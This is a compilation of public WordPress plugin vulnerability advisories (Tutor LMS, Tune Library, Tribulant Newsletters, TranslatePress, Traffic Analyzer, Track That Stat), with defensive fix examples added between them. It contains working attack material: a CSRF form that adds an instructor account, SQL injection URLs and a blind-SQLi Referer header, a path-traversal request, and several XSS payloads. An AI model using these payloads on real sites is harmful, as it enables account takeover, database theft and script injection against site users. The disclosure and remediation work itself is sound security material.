# Author Homepage: https://www.jinsonvarghese.com
# Version: 1.5.2 and below
# CVE : CVE-2020-8615
# 1. Description
# The Tutor LMS WordPress plugin is a feature-packed plugin that enables users to create and sell courses.
# An attacker can use CSRF to register themselves as an instructor or block other legit instructors.
# Consequently, if the option to create courses without admin approval is enabled on the plugin’s settings
# page, the attacker will be able to create courses directly as well. All WordPress websites
# using Tutor LMS version 1.5.2 and below are affected.
# 2. Proof of Concept
# As the requests for the approval and blocking of instructors are sent using the GET method, the CSRF
# attack to approve an attacker-controlled instructor account can be performed by having the admin
# visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=approve&instructor=8 directly,
# after retrieving the instructor ID during the registration process. An approved instructor can also be blocked
# by directing the admin to visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=blocked&instructor=7.
# CSRF attack can also be performed on the form present at https://TARGET/wp-admin/admin.php?page=tutor-instructors&sub_page=add_new_instructor
# in order to have the admin add an instructor account for the attacker, thus bypassing the requirement for approval.
# This can be done by tricking the admin to submit the below-given web form as a POST request. For example, if the web form is
# hosted on an attacker-controlled domain https://attacker.com/csrf.html, an admin who is logged in at https://TARGET can
# be tricked into visiting the link and triggering the request to add an instructor.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://TARGET/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="add_new_instructor" />
<input type="hidden" name="first_name" value="John" />
<input type="hidden" name="last_name" value="Doe" />
<input type="hidden" name="user_login" value="jd_instructor" />
<input type="hidden" name="email" value="jd@TARGET" />
<input type="hidden" name="phone_number" value="1231231231" />
<input type="hidden" name="password" value="Pa$$w0rd!" />
<input type="hidden" name="password_confirmation" value="Pa$$w0rd!" />
<input type="hidden" name="tutor_profile_bio" value="Et tempore culpa n" />
<input type="hidden" name="action" value="tutor_add_instructor" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
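How the admin-only actions above are tied to the page that legitimately issues them, added as an example and not Tutor LMS's 1.5.3 fix: the add-instructor form carries a nonce that the AJAX handler verifies before touching users, and the approve/block links carry a nonce that their handler verifies with `check_admin_referer()`. Hook names, nonce actions, capabilities and the user-meta key are assumptions.

```php
<?php
// Added example (not Tutor LMS's code): nonce-protected instructor management.
// Assumes WordPress is loaded; hook, nonce, capability and meta-key names are assumptions.

// 1. The legitimate form rendered on the plugin's admin page carries a nonce field.
function tutor_example_render_add_instructor_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-ajax.php' ) ) . '">';
    wp_nonce_field( 'tutor_add_instructor', '_tutor_nonce' ); // hidden nonce + referer inputs
    echo '<input type="hidden" name="action" value="tutor_add_instructor">';
    echo '<input type="text" name="user_login"> <input type="email" name="email">';
    echo '<input type="submit" value="Add instructor">';
    echo '</form>';
}

// 2. The handler refuses anything that lacks a valid nonce or the capability.
function tutor_example_add_instructor() {
    // check_ajax_referer() ends the request with 403 if the nonce is missing or
    // invalid. A page on another origin cannot read the nonce, so the cross-site
    // form in the PoC never reaches the code below.
    check_ajax_referer( 'tutor_add_instructor', '_tutor_nonce' );

    if ( ! current_user_can( 'create_users' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $login = sanitize_user( wp_unslash( isset( $_POST['user_login'] ) ? $_POST['user_login'] : '' ), true );
    $email = sanitize_email( wp_unslash( isset( $_POST['email'] ) ? $_POST['email'] : '' ) );
    if ( '' === $login || ! is_email( $email ) ) {
        wp_send_json_error( 'invalid input', 400 );
    }

    $user_id = wp_insert_user( array(
        'user_login' => $login,
        'user_email' => $email,
        'user_pass'  => wp_generate_password(), // never accept a password chosen by the request
        'role'       => 'subscriber',           // instructor status is granted separately (step 3)
    ) );
    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( $user_id->get_error_message(), 400 );
    }
    wp_send_json_success( array( 'user_id' => $user_id ) );
}
add_action( 'wp_ajax_tutor_add_instructor', 'tutor_example_add_instructor' );

// 3. Approve/block links in the instructor list carry a per-instructor nonce...
function tutor_example_approve_link( $instructor_id ) {
    $instructor_id = absint( $instructor_id );
    $url = add_query_arg( array(
        'page'       => 'tutor-instructors',
        'action'     => 'approve',
        'instructor' => $instructor_id,
    ), admin_url( 'admin.php' ) );
    return wp_nonce_url( $url, 'tutor_approve_instructor_' . $instructor_id );
}

// ...and the handler verifies it before changing state.
function tutor_example_handle_approve() {
    if ( ! isset( $_GET['action'], $_GET['instructor'] ) || 'approve' !== $_GET['action'] ) {
        return;
    }
    $instructor_id = absint( $_GET['instructor'] );
    check_admin_referer( 'tutor_approve_instructor_' . $instructor_id ); // dies on a bad nonce
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    update_user_meta( $instructor_id, '_tutor_instructor_status', 'approved' ); // assumed meta key
}
```

Binding the instructor ID into the nonce action (`tutor_approve_instructor_<id>`) means a nonce captured for one approval link cannot be replayed against another instructor within the nonce's lifetime.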
3. Timeline
Vulnerability reported to the Tutor LMS team – January 30, 2020.
Tutor LMS version 1.5.3 containing the fix released – February 4, 2020.
=======================================================================
title: SQL Injection
product: WordPress Tune Library Plugin
vulnerable version: 1.5.4 (and probably below)
fixed version: 1.5.5
CVE number: CVE-2015-3314
impact: CVSS Base Score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
homepage: https://wordpress.org/plugins/tune-library/
found: 2015-01-09
by: Hannes Trunde
mail: hannes.trunde@gmail.com
twitter: @hannestrunde
=======================================================================
Plugin description:
-------------------
"This plugin is used to import an XML iTunes Music Library file into your
WordPress database. Once imported, you can display a complete listing of your
music collection on a page of your WordPress site."
Source: https://wordpress.org/plugins/tune-library/
Recommendation:
---------------
The author has provided a fixed plugin version which should be installed
immediately.
Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, an SQL injection attack can be
performed when sorting artists by letter.
However, special conditions must be met in order to exploit this vulnerability:
1) The WordPress security feature wp_magic_quotes(), which is enabled by
default, has to be disabled.
2) The plugin-specific option "Filter artists by letter and show alphabetical
navigation" has to be enabled.
Proof of concept:
-----------------
The following HTTP request to the Tune Library page returns version, current
user and db name:
===============================================================================
http://www.site.com/?page_id=2&artistletter=G' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20
===============================================================================
Contact timeline:
------------------------
2015-04-08: Contacting author via mail.
2015-04-09: Author replies and announces a fix within a week.
2015-04-12: Mail from author, stating that plugin has been updated.
2015-04-14: Requesting CVE via post to the open source software security mailing
list: http://openwall.com/lists/oss-security/2015/04/14/5
2015-04-20: Release of security advisory.
Solution:
---------
Update to the most recent plugin version.
Workaround:
-----------
Make sure that wp_magic_quotes() is enabled and/or disable "Filter artists by
letter..." option.
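The artist-by-letter filter rewritten so that the request value never becomes part of the query text, added here as an example and not the Tune Library 1.5.5 fix: the parameter is validated as a single letter, escaped for `LIKE` with `$wpdb->esc_like()` and bound with `%s`. This works whether or not `wp_magic_quotes()` is enabled, which is the point: magic quotes are not a defence to rely on. Table and column names are assumptions.

```php
<?php
// Added example (not the Tune Library plugin's code): a LIKE filter that binds
// the user-supplied letter as a string parameter. Assumes WordPress is loaded;
// table and column names are assumptions.

function tune_library_example_artists_by_letter( $letter ) {
    global $wpdb;

    // Accept exactly one ASCII letter; anything else (including the quote in the
    // advisory's PoC) is refused before any SQL is built.
    if ( ! preg_match( '/^[A-Za-z]$/', $letter ) ) {
        return array();
    }

    $table = $wpdb->prefix . 'tune_library'; // assumed name

    // esc_like() escapes %, _ and \ so the letter cannot act as a LIKE wildcard;
    // prepare() then quotes the whole pattern for %s.
    $pattern = $wpdb->esc_like( $letter ) . '%';

    return $wpdb->get_results(
        $wpdb->prepare(
            "SELECT DISTINCT artist FROM {$table} WHERE artist LIKE %s ORDER BY artist",
            $pattern
        )
    );
}

// Caller: strip the slashes WordPress adds to request data, then validate.
function tune_library_example_handle_request() {
    $letter = isset( $_GET['artistletter'] ) ? wp_unslash( $_GET['artistletter'] ) : '';
    return tune_library_example_artists_by_letter( $letter );
}
```

The validation step is what makes the workaround in the advisory unnecessary: with a one-character allowlist in front of a prepared statement, neither magic quotes nor the plugin option changes the outcome.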
DefenseCode WebScanner DAST Advisory
WordPress Tribulant Newsletters Plugin
Multiple Security Vulnerabilities
Advisory ID: DC-2017-01-012
Advisory Title: WordPress Tribulant Newsletters Plugin
Multiple Vulnerabilities
Advisory URL: http://www.defensecode.com/advisories.php
Software: WordPress Tribulant Newsletters Plugin
Language: PHP
Version: 4.6.4.2 and below
Vendor Status: Vendor contacted, update released
Release Date: 2017/05/29
Risk: Medium
1. General Overview
===================
During the security audit of Tribulant Newsletters plugin for
WordPress CMS, multiple vulnerabilities were discovered using
DefenseCode WebScanner application security analysis platform.
More information about WebScanner is available at URL:
http://www.defensecode.com
2. Software Overview
====================
According to the authors, WordPress Tribulant Newsletters plugin is a
full-featured newsletter plugin for WordPress which fulfils all
subscribers, emails, marketing and newsletter related needs for both
personal and business environments.
According to wordpress.org, it has more than 9,000 active installs.
Homepage:
https://wordpress.org/plugins/newsletters-lite/
http://tribulant.com/plugins/view/1/wordpress-newsletter-plugin
3. Vulnerability Description
==================================
During the security analysis, WebScanner discovered File Disclosure
vulnerability and multiple Cross Site Scripting vulnerabilities in
Tribulant Newsletters plugin.
3.1 File Disclosure
----
Input: $_GET['file']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWINDOWS%5cwin.ini
3.2 Cross-Site Scripting
----
Input: $_GET['method']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=check-expired%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
3.3 Cross-Site Scripting
----
Input: $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Note: Subscriber id (parameter "id") must exist. Value 1 is a good guess for start
3.4 Cross-Site Scripting
----
Input: $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-lists&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
3.5 Cross-Site Scripting
----
Input: $_GET['value']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin-ajax.php?action=newsletters_gauge&value=1});alert(1);</script>
3.6 Cross-Site Scripting
----
Input: $_GET['order']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&orderby=theme_id&order=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
3.7 Cross-Site Scripting
----
Input: $_GET['wpmlsearchterm']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlsearchterm=x%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
3.8 Cross-Site Scripting
----
Input: $_GET['wpmlmessage']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&wpmlupdated=true&wpmlmessage=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
4. Solution
===========
Vendor resolved the security issues after we reported the
vulnerabilities. All users are strongly advised to update WordPress
Tribulant Newsletters plugin to the latest available version.
5. Credits
==========
Discovered with DefenseCode WebScanner security analyzer
by Neven Biruski.
6. Disclosure Timeline
======================
2017/04/04 Vendor contacted
2017/04/06 Vendor responded, update released
2017/05/29 Advisory released to the public
7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.
DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.
DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.
Subscribe for a free software trial on our website:
http://www.defensecode.com/
E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
# Exploit Title: WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 06-08-2021
# Exploit Author: Nosa Shandy (Apapedulimu)
# Vendor Homepage: https://translatepress.com/
# Software Link: https://wordpress.org/plugins/translatepress-multilingual/
# Reference: https://wpscan.com/vulnerability/b87fcc2f-c2eb-4e23-9757-d1c590f26d3f
# Version: 2.0.6
# Tested on: macOS 11.4
# CVE : CVE-2021-24610
Description:
The plugin does not properly filter the 'translated' parameter before storing it in the database. The 'trp_sanitize_string' function only strips "<script></script>" tags with preg_replace, so an attacker can use other HTML tags (for example an event-handler attribute) to execute JavaScript.
Steps to Reproduce:
1. Go to http://localhost:8888/wordpress/?trp-edit-translation=true
2. Enter a Gettext string.
3. Enter a payload such as <img src=x onerror=alert(4)>
4. Save; the payload is executed.
5. The homepage is affected as well.
Video : https://drive.google.com/file/d/1PnvjHuKCvjmom6xz_sxNLBu3jixCiHy_/view?usp=sharing
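The description above points at the root cause: a blacklist that only removes <script> blocks leaves every other tag and attribute intact. The added example below (not the plugin's code) re-creates that filter shape as an assumption, shows the advisory's payload passing through it, and contrasts it with contextual output encoding, the approach WordPress provides through esc_html() / wp_kses_post().

```python
import html
import re

# Constructed stand-in for a "remove <script>...</script>" blacklist filter.
# This is an assumption about the shape of trp_sanitize_string, not its code.
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)

# Detection rule for reviewing stored translation strings: any inline
# event-handler attribute (onerror=, onload=, ...) is a strong XSS indicator.
EVENT_HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)

# Constructed samples: the payload from step 3 of the advisory, a plain
# <script> payload the blacklist does catch, and a benign translation string.
SAMPLES = {
    "script": "<script>alert(1)</script>",
    "img_onerror": "<img src=x onerror=alert(4)>",
    "benign": "Bonjour & bienvenue",
}


def blacklist_sanitize(value: str) -> str:
    """Flawed approach: drop <script> blocks and pass everything else through."""
    return SCRIPT_TAG_RE.sub("", value)


def escape_for_html(value: str) -> str:
    """Correct approach for a text context: encode <, >, &, quotes so the browser
    renders the stored string as text instead of parsing it as markup."""
    return html.escape(value, quote=True)


def survives_blacklist(value: str) -> bool:
    """True when the filtered value still contains markup the browser would parse."""
    return "<" in blacklist_sanitize(value)


def looks_like_stored_xss(value: str) -> bool:
    """Review helper: flag stored strings carrying a tag with an event handler."""
    return "<" in value and bool(EVENT_HANDLER_RE.search(value))


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:12} blacklist -> {blacklist_sanitize(sample)!r}")
        print(f"{name:12} escaped   -> {escape_for_html(sample)!r}")
```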
# Exploit Title: Wordpress plugin 'Traffic Analyzer' Blind SQL Injection
# Google Dork: inurl:/plugins/trafficanalyzer/js/
# Date: 4/7/2015
# Exploit Author: Dan King (@fuzztester)
# Vendor Homepage: http://wptrafficanalyzer.in/
# Software Link: https://wordpress.org/plugins/trafficanalyzer/
# Version: 3.4.2
# Tested on: Ubuntu 14.10 with Mysql and Wordpress 4.11
[+] Issue [+]
The Wordpress plugin "Traffic Analyzer" contains a blind SQL injection vulnerability. The application does not properly validate the value of the "Referer" HTTP header.
[+] Impact [+]
This vulnerability would allow a remote attacker to access the database with the privileges configured for Wordpress. This could also lead to the attacker gaining access to the web server's filesystem and further compromising the system hosting the Wordpress installation.
[+] Details [+]
The following section of PHP code is where the vulnerability exists. The $sql variable is a concatenated string intended to be used to insert data into the database. The variable $referer is not checked for malicious data.
From 'class-TrafficAnalyzer.php' line number 297:
######################################################################################
$sql = " insert into $wpdb->prefix"."tanalyzer_pre ( hid,ip, script_name, user_agent, request_uri,resource_type,browser,resource,http_referer,wpta_cookie ) values ".
" ('".$hid."'," .
" '".$_SERVER["REMOTE_ADDR"]."', ".
"'".$_SERVER['SCRIPT_NAME']."', " .
" '".$_SERVER["HTTP_USER_AGENT"]."', ".
" '". $_SERVER['REQUEST_URI']. "', ".
" '".$resource_type."', " .
" '".$browser."', " .
" '".$resource ."', " .
" '".$referer . "', " .
" '".$this->wpta_cookie . "'" .
" )";
###########################################################################################
[+] Proof of Concept [+]
Sending the following HTTP request to a vulnerable site causes the response to be delayed by 30 seconds.
GET /[wordpress path]/ HTTP/1.1
Host: x.x.x.x
Referer: BLAH'||(SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) )||'
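The INSERT quoted above builds SQL by concatenating header values into the statement text. The added example below (not the plugin's code) reproduces that pattern against a reduced, constructed copy of the table in SQLite and sets it beside the fix, bound parameters; in WordPress the equivalent is $wpdb->prepare() with %s placeholders. SLEEP() and DUAL are MySQL-only, so the constructed payload uses a plain scalar subquery to make the same point.

```python
import sqlite3

# Constructed stand-in for the plugin's tanalyzer_pre table, cut down to the
# two columns needed for the demonstration.
SCHEMA = "CREATE TABLE wp_tanalyzer_pre (ip TEXT, http_referer TEXT)"

# Constructed payload in the shape of the advisory's Referer header: the quote
# closes the string literal, || appends a subquery result, and the trailing ||'
# re-opens the literal so the INSERT stays syntactically valid.
REFERER_PAYLOAD = "BLAH'||(SELECT 'Fdsf' WHERE 5435=5435)||'"

# A legitimate referer that happens to contain an apostrophe.
BENIGN_REFERER = "http://example.com/blog/o'reilly"


def insert_concatenated(conn, ip, referer):
    """Mirrors the advisory's string-built INSERT: header text becomes SQL."""
    sql = ("INSERT INTO wp_tanalyzer_pre (ip, http_referer) VALUES "
           "('" + ip + "', '" + referer + "')")
    conn.execute(sql)


def insert_parameterized(conn, ip, referer):
    """Fix: the driver sends values separately from the statement, so the
    referer is stored verbatim no matter what characters it contains."""
    conn.execute(
        "INSERT INTO wp_tanalyzer_pre (ip, http_referer) VALUES (?, ?)",
        (ip, referer),
    )


def stored_referer(insert_fn, referer):
    """Run one insert on a fresh in-memory DB and return what actually landed.
    Returns the string 'SQL_ERROR' if the statement failed to parse."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    try:
        insert_fn(conn, "203.0.113.7", referer)
    except sqlite3.OperationalError:
        return "SQL_ERROR"
    row = conn.execute("SELECT http_referer FROM wp_tanalyzer_pre").fetchone()
    conn.close()
    return row[0]


if __name__ == "__main__":
    for fn in (insert_concatenated, insert_parameterized):
        print(fn.__name__, "->", stored_referer(fn, REFERER_PAYLOAD), "|",
              stored_referer(fn, BENIGN_REFERER))
```

The concatenated version evaluates the injected subquery (the stored value is "BLAHFdsf") and fails outright on a harmless apostrophe; the parameterized version stores both inputs as plain text.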
source: https://www.securityfocus.com/bid/58948/info
The Traffic Analyzer plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[Xss]
source: https://www.securityfocus.com/bid/53551/info
The Track That Stat plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Track That Stat 1.0.8 is vulnerable; other versions may also be affected.
http://www.example.com/wp.bacon/wp-content/plugins/track-that-stat/js/trackthatstat.php?data=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B